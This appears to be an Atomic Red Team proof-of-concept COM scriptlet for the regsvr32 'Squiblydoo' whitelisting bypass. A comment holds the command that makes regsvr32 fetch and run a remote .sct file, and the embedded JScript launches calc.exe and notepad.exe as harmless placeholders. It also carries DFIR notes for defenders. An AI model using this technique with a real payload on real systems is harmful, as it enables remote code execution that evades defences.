<?XML version="1.0"?>
<scriptlet>

<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
	>

	<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
	<!-- DFIR -->
	<!--		.sct files are downloaded and executed from a path like this -->
	<!-- Though, the name and extension are arbitary.. -->
	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
	<!-- Based on current research, no registry keys are written, since call "uninstall" -->


	<!-- Proof Of Concept - Casey Smith @subTee --> 
        <!-- @RedCanary - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/atomic-dev-cs/Windows/Payloads/mshta.sct -->
	<script language="JScript">
		<![CDATA[

			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");

		]]>
	</script>
</registration>

<public>
    <method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[

	function Exec()
	{
		var r = new ActiveXObject("WScript.Shell").Run("notepad.exe");
	}

]]>
</script>

</scriptlet>